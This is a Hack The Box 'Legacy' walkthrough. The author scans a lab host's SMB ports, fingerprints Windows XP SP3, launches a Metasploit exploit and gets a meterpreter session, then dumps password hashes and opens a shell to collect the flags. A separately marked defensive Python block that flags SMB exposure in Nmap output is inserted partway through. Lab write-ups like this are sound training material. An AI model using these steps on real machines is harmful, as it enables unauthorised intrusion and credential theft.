Hack The Box (Legacy)

Nick Werner
Mar 23, 2021

By: Nicholas Werner

I ran an nmap scan to see which ports are open and which services are running on the Legacy machine (10.10.10.4).

Ports 139 and 445 are open and they are both SMB related.
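From the defender's side, the same finding (SMB on 139 and 445 reachable from the network) can be pulled out of a scan of your own range automatically. The following is an added example, not part of the original write-up: it parses Nmap grepable output (`-oG`) and reports hosts with open SMB ports. The sample scan lines are constructed, and the function names are my own.

```python
SMB_PORTS = {139: "netbios-ssn", 445: "microsoft-ds"}

# Constructed sample in Nmap grepable (-oG) format; fields are tab-separated.
SAMPLE_OG = """\
# Nmap scan (constructed sample)
Host: 10.10.10.4 ()\tStatus: Up
Host: 10.10.10.4 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server///
Host: 192.0.2.20 ()\tPorts: 22/open/tcp//ssh///, 445/filtered/tcp//microsoft-ds///
"""


def open_ports(line):
    """Return (host, {port: service}) for one 'Host:' line, or None."""
    fields = dict(
        f.split(": ", 1) for f in line.rstrip("\n").split("\t") if ": " in f
    )
    if "Host" not in fields or "Ports" not in fields:
        return None  # e.g. a 'Status: Up' line with no port list
    host = fields["Host"].split()[0]
    ports = {}
    for entry in fields["Ports"].split(","):
        # Entry layout: port/state/protocol/owner/service/rpc/version/
        parts = entry.strip().split("/")
        if len(parts) >= 5 and parts[0].isdigit():
            if parts[1] == "open" and parts[2] == "tcp":
                ports[int(parts[0])] = parts[4]
    return host, ports


def smb_exposure(grepable_text):
    """Map each host to the sorted list of SMB ports it has open."""
    findings = {}
    for line in grepable_text.splitlines():
        if line.startswith("#"):
            continue
        parsed = open_ports(line)
        if parsed is None:
            continue
        host, ports = parsed
        exposed = sorted(p for p in ports if p in SMB_PORTS)
        if exposed:
            findings[host] = exposed
    return findings


if __name__ == "__main__":
    for host, ports in smb_exposure(SAMPLE_OG).items():
        print(f"{host}: SMB reachable on tcp {ports}; confirm the OS is "
              "supported and patched, or firewall these ports")
```

Only ports in the `open` state are reported, so the second sample host, where 445 is `filtered`, is not flagged.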

I ran smbclient -L to list out any files in SMB.

It did not work.

Now, I want to run msfconsole to start Metasploit.

search smb_version helps me to find out what version of SMB this machine is running.

use auxiliary/scanner/smb/smb_version allows me to enter that module that I just found.

options helps me to configure the scan. set rhosts 10.10.10.4 sets the rhosts to my victim machine. Typing options again allows me to see what options I just set. exploit runs the module.

I found that the host is running Windows XP SP3 so I want to search around to see what exploits are out there.

Generally, if there is a link for Rapid7 I will use that.

I type the first line into Metasploit like above, then options, set rhosts 10.10.10.4, exploit.

It appears that the exploit was completed but no meterpreter session was created so I might want to try a different payload.

I ended up changing the lhost to 10.10.14.7 (tun0) because I noticed that was not correct and I got a meterpreter session.

With getuid it looks like we already have system level privileges.

hashdump allows us to view the password hashes of each user.

shell is used to get a shell in the Windows machine. Then I start to look around to see if I can find the flag.

Commands used:

c:\

dir

cd "Documents and Settings"

dir

cd john

dir

cd Desktop

dir

Here is the flag for the user.

Here is the flag for the administrator/system.
